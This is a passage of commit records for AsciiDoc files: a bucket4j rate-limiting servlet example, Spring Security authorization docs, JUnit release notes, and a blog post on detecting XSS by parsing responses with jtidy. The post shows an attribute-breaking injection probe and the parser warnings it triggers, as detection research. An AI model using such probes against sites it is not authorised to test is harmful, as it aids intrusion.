fully non-blocking,\nnon-blocking architecture means that both SMS sending and limit checking should be asynchronous. \n**Solution:** lets use asynchronous features provided by bucket4j and Servlet-API.\n\n**Mockup of service based on top of Servlet API and bucket4j-infinispan**:\n[source, java]\n----\npublic class SmsServlet extends javax.servlet.http.HttpServlet {\n\n private SmsSender smsSender;\n private AsyncProxyManager<String> buckets;\n private Supplier<BucketConfiguration> configuration;\n \n @Override\n public void init(ServletConfig config) throws ServletException {\n super.init(config);\n ServletContext ctx = config.getServletContext();\n \n smsSender = (SmsSender) ctx.getAttribute(\"sms-sender\");\n \n FunctionalMapImpl<String, byte[]> bucketMap = (FunctionalMapImpl<String, byte[]>) ctx.getAttribute(\"bucket-map\");\n this.buckets = new InfinispanProxyManager(bucketMap).asAsync();\n \n this.configuration = () -> {\n long overdraft = 20;\n Refill refill = Refill.greedy(10, Duration.ofMinutes(1));\n Bandwidth limit = Bandwidth.classic(overdraft, refill);\n return BucketConfiguratiion.builder()\n .addLimit(limit)\n .build();\n };\n }\n \n @Override\n protected void doPost(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {\n HttpServletRequest httpRequest = (HttpServletRequest) servletRequest;\n \n String fromNumber = req.getParameter(\"from\");\n String toNumber = req.getParameter(\"to\");\n String text = req.getParameter(\"text\");\n \n AsyncBucketProxy bucket = buckets.builder().build(fromNumber, configuration);\n CompletableFuture<ConsumptionProbe> limitCheckingFuture = bucket.asAsync().tryConsumeAndReturnRemaining(1);\n final AsyncContext asyncContext = req.startAsync();\n limitCheckingFuture.thenCompose(probe -> {\n if (!probe.isConsumed()) {\n Result throttledResult = Result.throttled(probe);\n return CompletableFuture.completedFuture(throttledResult);\n } else {\n CompletableFuture<Result> sendingFuture = smsSender.sendAsync(fromNumber, toNumber, text);\n return sendingFuture;\n }\n }).whenComplete((result, exception) -> {\n HttpServletResponse asyncResponse = (HttpServletResponse) asyncContext.getResponse();\n try {\n asyncResponse.setContentType(\"text\/plain\");\n if (exception != null || result.isFailed()) {\n asyncResponse.setStatus(500);\n asyncResponse.getWriter().println(\"Internal Error\");\n } else if (result.isThrottled()) {\n asyncResponse.setStatus(429);\n asyncResponse.setHeader(\"X-Rate-Limit-Retry-After-Seconds\", \"\" + result.getRetryAfter());\n asyncResponse.getWriter().append(\"Too many requests\");\n } else {\n asyncResponse.setStatus(200);\n asyncResponse.getWriter().append(\"Success\");\n }\n } finally{\n asyncContext.complete();\n }\n });\n }\n\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11a74a292602efb2d3ca13e492b5dcfb8476ba60","subject":"Fix method call example on documentation","message":"Fix method call example on documentation","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/servlet\/authorization\/authorize-http-requests.adoc","new_file":"docs\/modules\/ROOT\/pages\/servlet\/authorization\/authorize-http-requests.adoc","new_contents":"[[servlet-authorization-authorizationfilter]]\n= Authorize HttpServletRequests with AuthorizationFilter\n:figures: servlet\/authorization\n\nThis section builds on xref:servlet\/architecture.adoc#servlet-architecture[Servlet Architecture and Implementation] by digging deeper into how xref:servlet\/authorization\/index.adoc#servlet-authorization[authorization] works within Servlet-based applications.\n\n[NOTE]\n`AuthorizationFilter` supersedes xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\nTo remain backward compatible, `FilterSecurityInterceptor` remains the default.\nThis section discusses how `AuthorizationFilter` works and how to override the default configuration.\n\nThe {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] provides xref:servlet\/authorization\/index.adoc#servlet-authorization[authorization] for ``HttpServletRequest``s.\nIt is inserted into the xref:servlet\/architecture.adoc#servlet-filterchainproxy[FilterChainProxy] as one of the xref:servlet\/architecture.adoc#servlet-security-filters[Security Filters].\n\nYou can override the default when you declare a `SecurityFilterChain`.\nInstead of using xref:servlet\/authorization\/authorize-http-requests.adoc#servlet-authorize-requests-defaults[`authorizeRequests`], use `authorizeHttpRequests`, like so:\n\n.Use authorizeHttpRequests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().authenticated();\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nThis improves on `authorizeRequests` in a number of ways:\n\n1. Uses the simplified `AuthorizationManager` API instead of metadata sources, config attributes, decision managers, and voters.\nThis simplifies reuse and customization.\n2. Delays `Authentication` lookup.\nInstead of the authentication needing to be looked up for every request, it will only look it up in requests where an authorization decision requires authentication.\n3. Bean-based configuration support.\n\nWhen `authorizeHttpRequests` is used instead of `authorizeRequests`, then {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] is used instead of xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\n\n.Authorize HttpServletRequest\nimage::{figures}\/authorizationfilter.png[]\n\n* image:{icondir}\/number_1.png[] First, the `AuthorizationFilter` obtains an xref:servlet\/authentication\/architecture.adoc#servlet-authentication-authentication[Authentication] from the xref:servlet\/authentication\/architecture.adoc#servlet-authentication-securitycontextholder[SecurityContextHolder].\nIt wraps this in an `Supplier` in order to delay lookup.\n* image:{icondir}\/number_2.png[] Second, `AuthorizationFilter` creates a {security-api-url}org\/springframework\/security\/web\/FilterInvocation.html[`FilterInvocation`] from the `HttpServletRequest`, `HttpServletResponse`, and `FilterChain`.\n\/\/ FIXME: link to FilterInvocation\n* image:{icondir}\/number_3.png[] Next, it passes the `Supplier<Authentication>` and `FilterInvocation` to the xref:servlet\/architecture.adoc#authz-authorization-manager[`AuthorizationManager`].\n** image:{icondir}\/number_4.png[] If authorization is denied, an `AccessDeniedException` is thrown.\nIn this case the xref:servlet\/architecture.adoc#servlet-exceptiontranslationfilter[`ExceptionTranslationFilter`] handles the `AccessDeniedException`.\n** image:{icondir}\/number_5.png[] If access is granted, `AuthorizationFilter` continues with the xref:servlet\/architecture.adoc#servlet-filters-review[FilterChain] which allows the application to process normally.\n\nWe can configure Spring Security to have different rules by adding more rules in order of precedence.\n\n.Authorize Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n\thttp\n\t\t\/\/ ...\n\t\t.authorizeHttpRequests(authorize -> authorize \/\/ <1>\n\t\t\t.mvcMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t.mvcMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t.mvcMatchers(\"\/db\/**\").access(new WebExpressionAuthorizationManager(\"hasRole('ADMIN') and hasRole('DBA')\")) \/\/ <4>\n\t\t\t.anyRequest().denyAll() \/\/ <5>\n\t\t);\n\n\treturn http.build();\n}\n----\n====\n<1> There are multiple authorization rules specified.\nEach rule is considered in the order they were declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched on is denied access.\nThis is a good strategy if you do not want to accidentally forget to update your authorization rules.\n\nYou can take a bean-based approach by constructing your own xref:servlet\/authorization\/architecture.adoc#authz-delegate-authorization-manager[`RequestMatcherDelegatingAuthorizationManager`] like so:\n\n.Configure RequestMatcherDelegatingAuthorizationManager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http, AuthorizationManager<RequestAuthorizationContext> access)\n throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().access(access)\n )\n \/\/ ...\n\n return http.build();\n}\n\n@Bean\nAuthorizationManager<RequestAuthorizationContext> requestMatcherAuthorizationManager(HandlerMappingIntrospector introspector) {\n RequestMatcher permitAll =\n new AndRequestMatcher(\n new MvcRequestMatcher(introspector, \"\/resources\/**\"),\n new MvcRequestMatcher(introspector, \"\/signup\"),\n new MvcRequestMatcher(introspector, \"\/about\"));\n RequestMatcher admin = new MvcRequestMatcher(introspector, \"\/admin\/**\");\n RequestMatcher db = new MvcRequestMatcher(introspector, \"\/db\/**\");\n RequestMatcher any = AnyRequestMatcher.INSTANCE;\n AuthorizationManager<HttpRequestServlet> manager = RequestMatcherDelegatingAuthorizationManager.builder()\n .add(permitAll, (context) -> new AuthorizationDecision(true))\n .add(admin, AuthorityAuthorizationManager.hasRole(\"ADMIN\"))\n .add(db, AuthorityAuthorizationManager.hasRole(\"DBA\"))\n .add(any, new AuthenticatedAuthorizationManager())\n .build();\n return (context) -> manager.check(context.getRequest());\n}\n----\n====\n\nYou can also wire xref:servlet\/authorization\/architecture.adoc#authz-custom-authorization-manager[your own custom authorization managers] for any request matcher.\n\nHere is an example of mapping a custom authorization manager to the `my\/authorized\/endpoint`:\n\n.Custom Authorization Manager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .mvcMatchers(\"\/my\/authorized\/endpoint\").access(new CustomAuthorizationManager());\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nOr you can provide it for all requests as seen below:\n\n.Custom Authorization Manager for All Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().access(new CustomAuthorizationManager());\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nBy default, the `AuthorizationFilter` applies to all dispatcher types.\nWe can configure Spring Security to not apply the authorization rules to all dispatcher types by using the `shouldFilterAllDispatcherTypes` method:\n\n.Set shouldFilterAllDispatcherTypes to false\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .shouldFilterAllDispatcherTypes(false)\n .anyRequest().authenticated()\n )\n \/\/ ...\n\n return http.build();\n}\n----\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nopen fun web(http: HttpSecurity): SecurityFilterChain {\n http {\n authorizeHttpRequests {\n shouldFilterAllDispatcherTypes = false\n authorize(anyRequest, authenticated)\n }\n }\n return http.build()\n}\n----\n====\n","old_contents":"[[servlet-authorization-authorizationfilter]]\n= Authorize HttpServletRequests with AuthorizationFilter\n:figures: servlet\/authorization\n\nThis section builds on xref:servlet\/architecture.adoc#servlet-architecture[Servlet Architecture and Implementation] by digging deeper into how xref:servlet\/authorization\/index.adoc#servlet-authorization[authorization] works within Servlet-based applications.\n\n[NOTE]\n`AuthorizationFilter` supersedes xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\nTo remain backward compatible, `FilterSecurityInterceptor` remains the default.\nThis section discusses how `AuthorizationFilter` works and how to override the default configuration.\n\nThe {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] provides xref:servlet\/authorization\/index.adoc#servlet-authorization[authorization] for ``HttpServletRequest``s.\nIt is inserted into the xref:servlet\/architecture.adoc#servlet-filterchainproxy[FilterChainProxy] as one of the xref:servlet\/architecture.adoc#servlet-security-filters[Security Filters].\n\nYou can override the default when you declare a `SecurityFilterChain`.\nInstead of using xref:servlet\/authorization\/authorize-http-requests.adoc#servlet-authorize-requests-defaults[`authorizeRequests`], use `authorizeHttpRequests`, like so:\n\n.Use authorizeHttpRequests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().authenticated();\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nThis improves on `authorizeRequests` in a number of ways:\n\n1. Uses the simplified `AuthorizationManager` API instead of metadata sources, config attributes, decision managers, and voters.\nThis simplifies reuse and customization.\n2. Delays `Authentication` lookup.\nInstead of the authentication needing to be looked up for every request, it will only look it up in requests where an authorization decision requires authentication.\n3. Bean-based configuration support.\n\nWhen `authorizeHttpRequests` is used instead of `authorizeRequests`, then {security-api-url}org\/springframework\/security\/web\/access\/intercept\/AuthorizationFilter.html[`AuthorizationFilter`] is used instead of xref:servlet\/authorization\/authorize-requests.adoc#servlet-authorization-filtersecurityinterceptor[`FilterSecurityInterceptor`].\n\n.Authorize HttpServletRequest\nimage::{figures}\/authorizationfilter.png[]\n\n* image:{icondir}\/number_1.png[] First, the `AuthorizationFilter` obtains an xref:servlet\/authentication\/architecture.adoc#servlet-authentication-authentication[Authentication] from the xref:servlet\/authentication\/architecture.adoc#servlet-authentication-securitycontextholder[SecurityContextHolder].\nIt wraps this in an `Supplier` in order to delay lookup.\n* image:{icondir}\/number_2.png[] Second, `AuthorizationFilter` creates a {security-api-url}org\/springframework\/security\/web\/FilterInvocation.html[`FilterInvocation`] from the `HttpServletRequest`, `HttpServletResponse`, and `FilterChain`.\n\/\/ FIXME: link to FilterInvocation\n* image:{icondir}\/number_3.png[] Next, it passes the `Supplier<Authentication>` and `FilterInvocation` to the xref:servlet\/architecture.adoc#authz-authorization-manager[`AuthorizationManager`].\n** image:{icondir}\/number_4.png[] If authorization is denied, an `AccessDeniedException` is thrown.\nIn this case the xref:servlet\/architecture.adoc#servlet-exceptiontranslationfilter[`ExceptionTranslationFilter`] handles the `AccessDeniedException`.\n** image:{icondir}\/number_5.png[] If access is granted, `AuthorizationFilter` continues with the xref:servlet\/architecture.adoc#servlet-filters-review[FilterChain] which allows the application to process normally.\n\nWe can configure Spring Security to have different rules by adding more rules in order of precedence.\n\n.Authorize Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n\thttp\n\t\t\/\/ ...\n\t\t.authorizeHttpRequests(authorize -> authorize \/\/ <1>\n\t\t\t.mvcMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t.mvcMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t.mvcMatchers(\"\/db\/**\").access(new WebExpressionAuthorizationManager(\"hasRole('ADMIN') and hasRole('DBA')\")) \/\/ <4>\n\t\t\t.anyRequest().denyAll() \/\/ <5>\n\t\t);\n\n\treturn http.build();\n}\n----\n====\n<1> There are multiple authorization rules specified.\nEach rule is considered in the order they were declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched on is denied access.\nThis is a good strategy if you do not want to accidentally forget to update your authorization rules.\n\nYou can take a bean-based approach by constructing your own xref:servlet\/authorization\/architecture.adoc#authz-delegate-authorization-manager[`RequestMatcherDelegatingAuthorizationManager`] like so:\n\n.Configure RequestMatcherDelegatingAuthorizationManager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http, AuthorizationManager<RequestAuthorizationContext> access)\n throws AuthenticationException {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest().access(access)\n )\n \/\/ ...\n\n return http.build();\n}\n\n@Bean\nAuthorizationManager<RequestAuthorizationContext> requestMatcherAuthorizationManager(HandlerMappingIntrospector introspector) {\n RequestMatcher permitAll =\n new AndRequestMatcher(\n new MvcRequestMatcher(introspector, \"\/resources\/**\"),\n new MvcRequestMatcher(introspector, \"\/signup\"),\n new MvcRequestMatcher(introspector, \"\/about\"));\n RequestMatcher admin = new MvcRequestMatcher(introspector, \"\/admin\/**\");\n RequestMatcher db = new MvcRequestMatcher(introspector, \"\/db\/**\");\n RequestMatcher any = AnyRequestMatcher.INSTANCE;\n AuthorizationManager<HttpRequestServlet> manager = RequestMatcherDelegatingAuthorizationManager.builder()\n .add(permitAll, (context) -> new AuthorizationDecision(true))\n .add(admin, AuthorityAuthorizationManager.hasRole(\"ADMIN\"))\n .add(db, AuthorityAuthorizationManager.hasRole(\"DBA\"))\n .add(any, new AuthenticatedAuthorizationManager())\n .build();\n return (context) -> manager.check(context.getRequest());\n}\n----\n====\n\nYou can also wire xref:servlet\/authorization\/architecture.adoc#authz-custom-authorization-manager[your own custom authorization managers] for any request matcher.\n\nHere is an example of mapping a custom authorization manager to the `my\/authorized\/endpoint`:\n\n.Custom Authorization Manager\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .mvcMatchers(\"\/my\/authorized\/endpoint\").access(new CustomAuthorizationManager());\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nOr you can provide it for all requests as seen below:\n\n.Custom Authorization Manager for All Requests\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .anyRequest.access(new CustomAuthorizationManager());\n )\n \/\/ ...\n\n return http.build();\n}\n----\n====\n\nBy default, the `AuthorizationFilter` applies to all dispatcher types.\nWe can configure Spring Security to not apply the authorization rules to all dispatcher types by using the `shouldFilterAllDispatcherTypes` method:\n\n.Set shouldFilterAllDispatcherTypes to false\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\nSecurityFilterChain web(HttpSecurity http) throws Exception {\n http\n .authorizeHttpRequests((authorize) -> authorize\n .shouldFilterAllDispatcherTypes(false)\n .anyRequest.authenticated()\n )\n \/\/ ...\n\n return http.build();\n}\n----\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nopen fun web(http: HttpSecurity): SecurityFilterChain {\n http {\n authorizeHttpRequests {\n shouldFilterAllDispatcherTypes = false\n authorize(anyRequest, authenticated)\n }\n }\n return http.build()\n}\n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"709bc53c7dc92c7a7196cf3c88e0018a4fbdf1e8","subject":"Document #1850 in release notes","message":"Document #1850 in release notes\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* Support for declarative timeouts using `@Timeout` or configuration parameters (see\n <<..\/user-guide\/index.adoc#writing-tests-declarative-timeouts, User Guide>> for details)\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n* Added support for method URIs, e.g. `method:org.junit.Foo#bar()`, to `DynamicContainer`\n and `DynamicTest` factory methods.\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of `junit-vintage-engine` to allow for\n easier dependency management in Maven POMs.\n","old_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* Support for declarative timeouts using `@Timeout` or configuration parameters (see\n <<..\/user-guide\/index.adoc#writing-tests-declarative-timeouts, User Guide>> for details)\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of `junit-vintage-engine` to allow for\n easier dependency management in Maven POMs.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"065d8961c5ef5f9ef2f3d4c81a49cd159ec2aef5","subject":"Update 2015-05-24-More-XSS-Updates-Analyzer.adoc","message":"Update 2015-05-24-More-XSS-Updates-Analyzer.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-24-More-XSS-Updates-Analyzer.adoc","new_file":"_posts\/2015-05-24-More-XSS-Updates-Analyzer.adoc","new_contents":"= More XSS Updates (Analyzer)\n\nI once had a feature in Sentinel, which beautified the HTML source code of HTTP responses (using jtidy). This can be very useful for the user, as it can be hard to navigate and read machine-generated HTML code (or just think of stripped newlines). Sadly it had an un-nice behaviour: it stripped (\"beautified\") partial XSS, like surplus single or double quotes in tags. I never thought about it much again.\n\nAs described in the last post, the OWASP AppSecEU 15 presentation with the title of \"Finding Bad Needles on a Worldwide Scale\" http:\/\/www.slideshare.net\/dimisec\/badneedles discussed finding XSS vulnerabilities on a large scale. The author explained a techniq where he just let a HTTP parser parse the HTTP response. If a syntax error occured, the attack payload was breaking the context, which is a good indicator for a successful XSS attack. \n\nWhen i've seen that jtidy has a log message listener (http:\/\/sourceforge.net\/p\/jtidy\/code\/HEAD\/tree\/trunk\/jtidy\/src\/main\/java\/org\/w3c\/tidy\/TidyMessageListener.java), i realized i already have all the things i need to implement this feature too.\n\n\n== Testing onmouseover\n\nOriginal: changeme4\n\n[source]\n----\n<H2>Update Your Preferences<\/H2><p>\n<FORM>\nHomepage: <input value=\"changeme4\" name=\"in\" size=\"40\"><BR>\n<input type=\"submit\" value=\"Change\"><\/FORM>\n----\n\n\n[source]\n----\n23 - trimming empty <p>\n110 - InputStream: Doctype given is \"\"\n111 - InputStream: Document content looks like HTML 3.2\n----\n\nWith the input vector of: changeme4Xssaa\"+= (the + is whitespace, url encoded)\n\n[source]\n----\n<H2>Update Your Preferences<\/H2><p>\n<FORM>\nHomepage: <input value=\"changeme4Xssaa\" =\" name=\"in\" size=\"40\"><BR>\n<input type=\"submit\" value=\"Change\"><\/FORM>\n----\n\n[source]\n----\n23 - trimming empty <p>\n69 - <input> unexpected =, expected attribute name\n59 - <input> unexpected or duplicate quote mark\n110 - InputStream: Doctype given is \"\"\n111 - InputStream: Document content looks like HTML 3.2\n----\n\n\n== Sample output\n\n\n","old_contents":"= More XSS Updates (Analyzer)\n\nI once had a feature in Sentinel, which beautified the HTML source code of HTTP responses (using jtidy). This can be very useful for the user, as it can be hard to navigate and read machine-generated HTML code (or just think of stripped newlines). Sadly it had an un-nice behaviour: it stripped (\"beautified\") partial XSS, like surplus single or double quotes in tags. I never thought about it much again.\n\nAs described in the last post, the OWASP AppSecEU 15 presentation with the title of \"Finding Bad Needles on a Worldwide Scale\" http:\/\/www.slideshare.net\/dimisec\/badneedles discussed finding XSS vulnerabilities on a large scale. The author explained a techniq where he just let a HTTP parser parse the HTTP response. If a syntax error occured, the attack payload was breaking the context, which is a good indicator for a successful XSS attack. There i realized i already have all the things i need to implement this feature too.\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0d296a6e9a124751d44958aa4eb52fc15f4c867a","subject":"Update 2016-11-16-Hacking-Daily-News-161116.adoc","message":"Update 